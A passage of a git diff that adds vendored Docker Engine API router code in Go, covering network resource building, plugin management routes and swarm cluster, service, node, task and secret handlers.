"swarm" + } + r.Driver = nw.Type() + r.EnableIPv6 = info.IPv6Enabled() + r.Internal = info.Internal() + r.Attachable = info.Attachable() + r.Options = info.DriverOptions() + r.Containers = make(map[string]types.EndpointResource) + buildIpamResources(r, info) + r.Labels = info.Labels() + + peers := info.Peers() + if len(peers) != 0 { + r.Peers = buildPeerInfoResources(peers) + } + + epl := nw.Endpoints() + for _, e := range epl { + ei := e.Info() + if ei == nil { + continue + } + sb := ei.Sandbox() + tmpID := e.ID() + key := "ep-" + tmpID + if sb != nil { + key = sb.ContainerID() + } + + r.Containers[key] = buildEndpointResource(tmpID, e.Name(), ei) + } + return r +} + +func buildPeerInfoResources(peers []networkdb.PeerInfo) []network.PeerInfo { + peerInfo := make([]network.PeerInfo, 0, len(peers)) + for _, peer := range peers { + peerInfo = append(peerInfo, network.PeerInfo{ + Name: peer.Name, + IP: peer.IP, + }) + } + return peerInfo +} + +func buildIpamResources(r *types.NetworkResource, nwInfo libnetwork.NetworkInfo) { + id, opts, ipv4conf, ipv6conf := nwInfo.IpamConfig() + + ipv4Info, ipv6Info := nwInfo.IpamInfo() + + r.IPAM.Driver = id + + r.IPAM.Options = opts + + r.IPAM.Config = []network.IPAMConfig{} + for _, ip4 := range ipv4conf { + if ip4.PreferredPool == "" { + continue + } + iData := network.IPAMConfig{} + iData.Subnet = ip4.PreferredPool + iData.IPRange = ip4.SubPool + iData.Gateway = ip4.Gateway + iData.AuxAddress = ip4.AuxAddresses + r.IPAM.Config = append(r.IPAM.Config, iData) + } + + if len(r.IPAM.Config) == 0 { + for _, ip4Info := range ipv4Info { + iData := network.IPAMConfig{} + iData.Subnet = ip4Info.IPAMData.Pool.String() + iData.Gateway = ip4Info.IPAMData.Gateway.IP.String() + r.IPAM.Config = append(r.IPAM.Config, iData) + } + } + + hasIpv6Conf := false + for _, ip6 := range ipv6conf { + if ip6.PreferredPool == "" { + continue + } + hasIpv6Conf = true + iData := network.IPAMConfig{} + iData.Subnet = ip6.PreferredPool + iData.IPRange = ip6.SubPool + iData.Gateway = ip6.Gateway + iData.AuxAddress = ip6.AuxAddresses + r.IPAM.Config = append(r.IPAM.Config, iData) + } + + if !hasIpv6Conf { + for _, ip6Info := range ipv6Info { + if ip6Info.IPAMData.Pool == nil { + continue + } + iData := network.IPAMConfig{} + iData.Subnet = ip6Info.IPAMData.Pool.String() + iData.Gateway = ip6Info.IPAMData.Gateway.String() + r.IPAM.Config = append(r.IPAM.Config, iData) + } + } +} + +func buildEndpointResource(id string, name string, info libnetwork.EndpointInfo) types.EndpointResource { + er := types.EndpointResource{} + + er.EndpointID = id + er.Name = name + ei := info + if ei == nil { + return er + } + + if iface := ei.Iface(); iface != nil { + if mac := iface.MacAddress(); mac != nil { + er.MacAddress = mac.String() + } + if ip := iface.Address(); ip != nil && len(ip.IP) > 0 { + er.IPv4Address = ip.String() + } + + if ipv6 := iface.AddressIPv6(); ipv6 != nil && len(ipv6.IP) > 0 { + er.IPv6Address = ipv6.String() + } + } + return er +} + +func (n *networkRouter) postNetworksPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneReport, err := n.backend.NetworksPrune(filters.Args{}) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/backend.go b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go new file mode 100644 index 0000000000..ab006b2256 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go @@ -0,0 +1,25 @@ +package plugin + +import ( + "io" + "net/http" + + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +// Backend for Plugin +type Backend interface { + Disable(name string, config *enginetypes.PluginDisableConfig) error + Enable(name string, config *enginetypes.PluginEnableConfig) error + List() ([]enginetypes.Plugin, error) + Inspect(name string) (*enginetypes.Plugin, error) + Remove(name string, config *enginetypes.PluginRmConfig) error + Set(name string, args []string) error + Privileges(ctx context.Context, ref reference.Named, metaHeaders http.Header, authConfig *enginetypes.AuthConfig) (enginetypes.PluginPrivileges, error) + Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + Push(ctx context.Context, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, outStream io.Writer) error + Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *enginetypes.PluginCreateOptions) error +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go new file mode 100644 index 0000000000..e4ea9e23bf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go @@ -0,0 +1,39 @@ +package plugin + +import "github.com/docker/docker/api/server/router" + +// pluginRouter is a router to talk with the plugin controller +type pluginRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new plugin router +func NewRouter(b Backend) router.Router { + r := &pluginRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the plugin controller +func (r *pluginRouter) Routes() []router.Route { + return r.routes +} + +func (r *pluginRouter) initRoutes() { + r.routes = []router.Route{ + router.NewGetRoute("/plugins", r.listPlugins), + router.NewGetRoute("/plugins/{name:.*}/json", r.inspectPlugin), + router.NewGetRoute("/plugins/privileges", r.getPrivileges), + router.NewDeleteRoute("/plugins/{name:.*}", r.removePlugin), + router.NewPostRoute("/plugins/{name:.*}/enable", r.enablePlugin), // PATCH? + router.NewPostRoute("/plugins/{name:.*}/disable", r.disablePlugin), + router.Cancellable(router.NewPostRoute("/plugins/pull", r.pullPlugin)), + router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/push", r.pushPlugin)), + router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/upgrade", r.upgradePlugin)), + router.NewPostRoute("/plugins/{name:.*}/set", r.setPlugin), + router.NewPostRoute("/plugins/create", r.createPlugin), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go new file mode 100644 index 0000000000..693fa95baf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go @@ -0,0 +1,314 @@ +package plugin + +import ( + "encoding/base64" + "encoding/json" + "net/http" + "strconv" + "strings" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func parseHeaders(headers http.Header) (map[string][]string, *types.AuthConfig) { + + metaHeaders := map[string][]string{} + for k, v := range headers { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + + // Get X-Registry-Auth + authEncoded := headers.Get("X-Registry-Auth") + authConfig := &types.AuthConfig{} + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + authConfig = &types.AuthConfig{} + } + } + + return metaHeaders, authConfig +} + +// parseRemoteRef parses the remote reference into a reference.Named +// returning the tag associated with the reference. In the case the +// given reference string includes both digest and tag, the returned +// reference will have the digest without the tag, but the tag will +// be returned. +func parseRemoteRef(remote string) (reference.Named, string, error) { + // Parse remote reference, supporting remotes with name and tag + // NOTE: Using distribution reference to handle references + // containing both a name and digest + remoteRef, err := distreference.ParseNamed(remote) + if err != nil { + return nil, "", err + } + + var tag string + if t, ok := remoteRef.(distreference.Tagged); ok { + tag = t.Tag() + } + + // Convert distribution reference to docker reference + // TODO: remove when docker reference changes reconciled upstream + ref, err := reference.WithName(remoteRef.Name()) + if err != nil { + return nil, "", err + } + if d, ok := remoteRef.(distreference.Digested); ok { + ref, err = reference.WithDigest(ref, d.Digest()) + if err != nil { + return nil, "", err + } + } else if tag != "" { + ref, err = reference.WithTag(ref, tag) + if err != nil { + return nil, "", err + } + } else { + ref = reference.WithDefaultTag(ref) + } + + return ref, tag, nil +} + +func (pr *pluginRouter) getPrivileges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + metaHeaders, authConfig := parseHeaders(r.Header) + + ref, _, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + privileges, err := pr.backend.Privileges(ctx, ref, metaHeaders, authConfig) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, privileges) +} + +func (pr *pluginRouter) upgradePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + var privileges types.PluginPrivileges + dec := json.NewDecoder(r.Body) + if err := dec.Decode(&privileges); err != nil { + return errors.Wrap(err, "failed to parse privileges") + } + if dec.More() { + return errors.New("invalid privileges") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + ref, tag, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + name, err := getName(ref, tag, vars["name"]) + if err != nil { + return err + } + w.Header().Set("Docker-Plugin-Name", name) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Upgrade(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + + return nil +} + +func (pr *pluginRouter) pullPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + var privileges types.PluginPrivileges + dec := json.NewDecoder(r.Body) + if err := dec.Decode(&privileges); err != nil { + return errors.Wrap(err, "failed to parse privileges") + } + if dec.More() { + return errors.New("invalid privileges") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + ref, tag, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + name, err := getName(ref, tag, r.FormValue("name")) + if err != nil { + return err + } + w.Header().Set("Docker-Plugin-Name", name) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Pull(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + + return nil +} + +func getName(ref reference.Named, tag, name string) (string, error) { + if name == "" { + if _, ok := ref.(reference.Canonical); ok { + trimmed := reference.TrimNamed(ref) + if tag != "" { + nt, err := reference.WithTag(trimmed, tag) + if err != nil { + return "", err + } + name = nt.String() + } else { + name = reference.WithDefaultTag(trimmed).String() + } + } else { + name = ref.String() + } + } else { + localRef, err := reference.ParseNamed(name) + if err != nil { + return "", err + } + if _, ok := localRef.(reference.Canonical); ok { + return "", errors.New("cannot use digest in plugin tag") + } + if distreference.IsNameOnly(localRef) { + // TODO: log change in name to out stream + name = reference.WithDefaultTag(localRef).String() + } + } + return name, nil +} + +func (pr *pluginRouter) createPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + options := &types.PluginCreateOptions{ + RepoName: r.FormValue("name")} + + if err := pr.backend.CreateFromContext(ctx, r.Body, options); err != nil { + return err + } + //TODO: send progress bar + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (pr *pluginRouter) enablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + timeout, err := strconv.Atoi(r.Form.Get("timeout")) + if err != nil { + return err + } + config := &types.PluginEnableConfig{Timeout: timeout} + + return pr.backend.Enable(name, config) +} + +func (pr *pluginRouter) disablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.PluginDisableConfig{ + ForceDisable: httputils.BoolValue(r, "force"), + } + + return pr.backend.Disable(name, config) +} + +func (pr *pluginRouter) removePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.PluginRmConfig{ + ForceRemove: httputils.BoolValue(r, "force"), + } + return pr.backend.Remove(name, config) +} + +func (pr *pluginRouter) pushPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Push(ctx, vars["name"], metaHeaders, authConfig, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + return nil +} + +func (pr *pluginRouter) setPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var args []string + if err := json.NewDecoder(r.Body).Decode(&args); err != nil { + return err + } + if err := pr.backend.Set(vars["name"], args); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (pr *pluginRouter) listPlugins(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + l, err := pr.backend.List() + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, l) +} + +func (pr *pluginRouter) inspectPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + result, err := pr.backend.Inspect(vars["name"]) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, result) +} diff --git a/vendor/github.com/docker/docker/api/server/router/router.go b/vendor/github.com/docker/docker/api/server/router/router.go new file mode 100644 index 0000000000..2de25c27ff --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/router.go @@ -0,0 +1,19 @@ +package router + +import "github.com/docker/docker/api/server/httputils" + +// Router defines an interface to specify a group of routes to add to the docker server. +type Router interface { + // Routes returns the list of routes to add to the docker server. + Routes() []Route +} + +// Route defines an individual API route in the docker server. +type Route interface { + // Handler returns the raw function to create the http handler. + Handler() httputils.APIFunc + // Method returns the http method that the route responds to. + Method() string + // Path returns the subpath where the route responds to. + Path() string +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/backend.go b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go new file mode 100644 index 0000000000..33840f0d30 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go @@ -0,0 +1,36 @@ +package swarm + +import ( + basictypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + types "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// Backend abstracts an swarm commands manager. +type Backend interface { + Init(req types.InitRequest) (string, error) + Join(req types.JoinRequest) error + Leave(force bool) error + Inspect() (types.Swarm, error) + Update(uint64, types.Spec, types.UpdateFlags) error + GetUnlockKey() (string, error) + UnlockSwarm(req types.UnlockRequest) error + GetServices(basictypes.ServiceListOptions) ([]types.Service, error) + GetService(string) (types.Service, error) + CreateService(types.ServiceSpec, string) (*basictypes.ServiceCreateResponse, error) + UpdateService(string, uint64, types.ServiceSpec, string, string) (*basictypes.ServiceUpdateResponse, error) + RemoveService(string) error + ServiceLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + GetNodes(basictypes.NodeListOptions) ([]types.Node, error) + GetNode(string) (types.Node, error) + UpdateNode(string, uint64, types.NodeSpec) error + RemoveNode(string, bool) error + GetTasks(basictypes.TaskListOptions) ([]types.Task, error) + GetTask(string) (types.Task, error) + GetSecrets(opts basictypes.SecretListOptions) ([]types.Secret, error) + CreateSecret(s types.SecretSpec) (string, error) + RemoveSecret(id string) error + GetSecret(id string) (types.Secret, error) + UpdateSecret(id string, version uint64, spec types.SecretSpec) error +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go new file mode 100644 index 0000000000..e2d5ad19b8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go @@ -0,0 +1,52 @@ +package swarm + +import "github.com/docker/docker/api/server/router" + +// swarmRouter is a router to talk with the build controller +type swarmRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new build router +func NewRouter(b Backend) router.Router { + r := &swarmRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the swarm controller +func (sr *swarmRouter) Routes() []router.Route { + return sr.routes +} + +func (sr *swarmRouter) initRoutes() { + sr.routes = []router.Route{ + router.NewPostRoute("/swarm/init", sr.initCluster), + router.NewPostRoute("/swarm/join", sr.joinCluster), + router.NewPostRoute("/swarm/leave", sr.leaveCluster), + router.NewGetRoute("/swarm", sr.inspectCluster), + router.NewGetRoute("/swarm/unlockkey", sr.getUnlockKey), + router.NewPostRoute("/swarm/update", sr.updateCluster), + router.NewPostRoute("/swarm/unlock", sr.unlockCluster), + router.NewGetRoute("/services", sr.getServices), + router.NewGetRoute("/services/{id}", sr.getService), + router.NewPostRoute("/services/create", sr.createService), + router.NewPostRoute("/services/{id}/update", sr.updateService), + router.NewDeleteRoute("/services/{id}", sr.removeService), + router.Experimental(router.Cancellable(router.NewGetRoute("/services/{id}/logs", sr.getServiceLogs))), + router.NewGetRoute("/nodes", sr.getNodes), + router.NewGetRoute("/nodes/{id}", sr.getNode), + router.NewDeleteRoute("/nodes/{id}", sr.removeNode), + router.NewPostRoute("/nodes/{id}/update", sr.updateNode), + router.NewGetRoute("/tasks", sr.getTasks), + router.NewGetRoute("/tasks/{id}", sr.getTask), + router.NewGetRoute("/secrets", sr.getSecrets), + router.NewPostRoute("/secrets/create", sr.createSecret), + router.NewDeleteRoute("/secrets/{id}", sr.removeSecret), + router.NewGetRoute("/secrets/{id}", sr.getSecret), + router.NewPostRoute("/secrets/{id}/update", sr.updateSecret), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go new file mode 100644 index 0000000000..fe976434bc --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go @@ -0,0 +1,418 @@ +package swarm + +import ( + "encoding/json" + "fmt" + "net/http" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + basictypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func (sr *swarmRouter) initCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.InitRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + nodeID, err := sr.backend.Init(req) + if err != nil { + logrus.Errorf("Error initializing swarm: %v", err) + return err + } + return httputils.WriteJSON(w, http.StatusOK, nodeID) +} + +func (sr *swarmRouter) joinCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.JoinRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + return sr.backend.Join(req) +} + +func (sr *swarmRouter) leaveCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + force := httputils.BoolValue(r, "force") + return sr.backend.Leave(force) +} + +func (sr *swarmRouter) inspectCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + swarm, err := sr.backend.Inspect() + if err != nil { + logrus.Errorf("Error getting swarm: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, swarm) +} + +func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var swarm types.Spec + if err := json.NewDecoder(r.Body).Decode(&swarm); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid swarm version '%s': %s", rawVersion, err.Error()) + } + + var flags types.UpdateFlags + + if value := r.URL.Query().Get("rotateWorkerToken"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateWorkerToken: %s", value) + } + + flags.RotateWorkerToken = rot + } + + if value := r.URL.Query().Get("rotateManagerToken"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateManagerToken: %s", value) + } + + flags.RotateManagerToken = rot + } + + if value := r.URL.Query().Get("rotateManagerUnlockKey"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateManagerUnlockKey: %s", value) + } + + flags.RotateManagerUnlockKey = rot + } + + if err := sr.backend.Update(version, swarm, flags); err != nil { + logrus.Errorf("Error configuring swarm: %v", err) + return err + } + return nil +} + +func (sr *swarmRouter) unlockCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.UnlockRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + + if err := sr.backend.UnlockSwarm(req); err != nil { + logrus.Errorf("Error unlocking swarm: %v", err) + return err + } + return nil +} + +func (sr *swarmRouter) getUnlockKey(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + unlockKey, err := sr.backend.GetUnlockKey() + if err != nil { + logrus.WithError(err).Errorf("Error retrieving swarm unlock key") + return err + } + + return httputils.WriteJSON(w, http.StatusOK, &basictypes.SwarmUnlockKeyResponse{ + UnlockKey: unlockKey, + }) +} + +func (sr *swarmRouter) getServices(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + services, err := sr.backend.GetServices(basictypes.ServiceListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting services: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, services) +} + +func (sr *swarmRouter) getService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + service, err := sr.backend.GetService(vars["id"]) + if err != nil { + logrus.Errorf("Error getting service %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, service) +} + +func (sr *swarmRouter) createService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var service types.ServiceSpec + if err := json.NewDecoder(r.Body).Decode(&service); err != nil { + return err + } + + // Get returns "" if the header does not exist + encodedAuth := r.Header.Get("X-Registry-Auth") + + resp, err := sr.backend.CreateService(service, encodedAuth) + if err != nil { + logrus.Errorf("Error creating service %s: %v", service.Name, err) + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, resp) +} + +func (sr *swarmRouter) updateService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var service types.ServiceSpec + if err := json.NewDecoder(r.Body).Decode(&service); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid service version '%s': %s", rawVersion, err.Error()) + } + + // Get returns "" if the header does not exist + encodedAuth := r.Header.Get("X-Registry-Auth") + + registryAuthFrom := r.URL.Query().Get("registryAuthFrom") + + resp, err := sr.backend.UpdateService(vars["id"], version, service, encodedAuth, registryAuthFrom) + if err != nil { + logrus.Errorf("Error updating service %s: %v", vars["id"], err) + return err + } + return httputils.WriteJSON(w, http.StatusOK, resp) +} + +func (sr *swarmRouter) removeService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := sr.backend.RemoveService(vars["id"]); err != nil { + logrus.Errorf("Error removing service %s: %v", vars["id"], err) + return err + } + return nil +} + +func (sr *swarmRouter) getServiceLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + // Args are validated before the stream starts because when it starts we're + // sending HTTP 200 by writing an empty chunk of data to tell the client that + // daemon is going to stream. By sending this initial HTTP 200 we can't report + // any error after the stream starts (i.e. container not found, wrong parameters) + // with the appropriate status code. + stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr") + if !(stdout || stderr) { + return fmt.Errorf("Bad parameters: you must choose at least one stream") + } + + serviceName := vars["id"] + logsConfig := &backend.ContainerLogsConfig{ + ContainerLogsOptions: basictypes.ContainerLogsOptions{ + Follow: httputils.BoolValue(r, "follow"), + Timestamps: httputils.BoolValue(r, "timestamps"), + Since: r.Form.Get("since"), + Tail: r.Form.Get("tail"), + ShowStdout: stdout, + ShowStderr: stderr, + Details: httputils.BoolValue(r, "details"), + }, + OutStream: w, + } + + if logsConfig.Details { + return fmt.Errorf("Bad parameters: details is not currently supported") + } + + chStarted := make(chan struct{}) + if err := sr.backend.ServiceLogs(ctx, serviceName, logsConfig, chStarted); err != nil { + select { + case <-chStarted: + // The client may be expecting all of the data we're sending to + // be multiplexed, so send it through OutStream, which will + // have been set up to handle that if needed. + fmt.Fprintf(logsConfig.OutStream, "Error grabbing service logs: %v\n", err) + default: + return err + } + } + + return nil +} + +func (sr *swarmRouter) getNodes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + nodes, err := sr.backend.GetNodes(basictypes.NodeListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting nodes: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, nodes) +} + +func (sr *swarmRouter) getNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + node, err := sr.backend.GetNode(vars["id"]) + if err != nil { + logrus.Errorf("Error getting node %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, node) +} + +func (sr *swarmRouter) updateNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var node types.NodeSpec + if err := json.NewDecoder(r.Body).Decode(&node); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid node version '%s': %s", rawVersion, err.Error()) + } + + if err := sr.backend.UpdateNode(vars["id"], version, node); err != nil { + logrus.Errorf("Error updating node %s: %v", vars["id"], err) + return err + } + return nil +} + +func (sr *swarmRouter) removeNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + force := httputils.BoolValue(r, "force") + + if err := sr.backend.RemoveNode(vars["id"], force); err != nil { + logrus.Errorf("Error removing node %s: %v", vars["id"], err) + return err + } + return nil +} + +func (sr *swarmRouter) getTasks(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + tasks, err := sr.backend.GetTasks(basictypes.TaskListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting tasks: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, tasks) +} + +func (sr *swarmRouter) getTask(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + task, err := sr.backend.GetTask(vars["id"]) + if err != nil { + logrus.Errorf("Error getting task %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, task) +} + +func (sr *swarmRouter) getSecrets(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + secrets, err := sr.backend.GetSecrets(basictypes.SecretListOptions{Filters: filters}) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, secrets) +} + +func (sr *swarmRouter) createSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var secret types.SecretSpec + if err := json.NewDecoder(r.Body).Decode(&secret); err != nil { + return err + } + + id, err := sr.backend.CreateSecret(secret) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &basictypes.SecretCreateResponse{ + ID: id, + }) +} + +func (sr *swarmRouter) removeSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := sr.backend.RemoveSecret(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + + return nil +} + +func (sr *swarmRouter) getSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + secret, err := sr.backend.GetSecret(vars["id"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, secret) +} + +func (sr *swarmRouter) updateSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var secret types.SecretSpec + if err := json.NewDecoder(r.Body).Decode(&secret); err != nil { + return errors.NewBadRequestError(err) + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return errors.NewBadRequestError(fmt.Errorf("invalid secret version")) + } + + id := vars["id"] + if err := sr.backend.UpdateSecret(id, version, secret); err != nil { + return err + } + + return nil +} diff --git 